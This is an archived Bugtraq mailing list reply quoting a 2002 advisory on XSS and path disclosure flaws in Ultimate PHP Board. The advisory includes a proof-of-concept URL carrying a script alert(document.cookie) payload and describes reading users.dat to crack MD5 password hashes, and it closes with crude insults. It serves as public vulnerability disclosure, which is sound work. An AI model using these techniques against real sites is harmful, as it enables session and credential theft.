Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: XSS and Path Disclosure in UPB

From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 09 Dec 2002 10:47:50 +0100


Anything about UPB was already wrote (1.1 & 1.0beta) :
http://www.frogsecure.com/tutos/UPB.txt




From: "euronymous" <just-a-user () yandex ru>
Reply-To: just-a-user () yandex ru
To: bugtraq () securityfocus com, vulnwatch () vulnwatch org
Subject: XSS and Path Disclosure in UPB
Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in UPB
product: Ultimate PHP Board (UPB) final beta 1.0
vendor: http://www.webrc.ca/php/upb.php
risk: middle
date: 12/7/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/009.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------

1) when calling add.php, which comming with upb, it output some
error message, that contain foloving information:

================================================================
Warning: Failed opening 'textdb_v2.inc.php' for inclusion
(include_path='.:/usr/local/lib/php') in
/home/samcom/public_html/public/messageboard2/add.php on line 5
attempting to edit record...

Fatal error: Call to undefined function: format_field() in
/home/samcom/public_html/public/messageboard2/add.php on line 11
================================================================

as you can see, script output contain full physical path of the
board.

2). but if user has deleted this file (add.php) u can to view
the full path in this way:

==============================================================
http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
==============================================================

cos the `id' parameter doesnt check if input data has entered
correctly, then it output folloving error message:

===================--======= snip =============================
Warning: Unable to access ./data_dir/some_shit.dat in
/home/samcom/public_html/public/messageboard2/textdb.inc.php on
line 240

..

Warning: Supplied argument is not a valid File-Handle resource
in /home/samcom/public_html/public/messageboard2/textdb.inc.php
on line 241

..
=========================== snip ==============================

where `data_dir' is the name of directory, where stored important
files, eg users.dat with users passwords (md5). in default name
of this directory is `db'.

if user doesnt make this dir secure, then you can to get the users
passwds with reading file users.dat (default name.. but it is an
old stuff) and cracking the .md5 hashes.

3) cos the above, file viewtopic.php doesnt check at all, the you
can insert some html in scripts output:

========================================================
http://hostname.com/phorum/viewtopic.php?id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
========================================================

[it must be in a single string]

not URL-encoded string working fine also.
ps. all of this issues applied to previus versions upb.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
russian security guyz!! and kate for she is kewl girl ))
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================



_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Previous By Date Next
Previous By Thread Next

Current thread: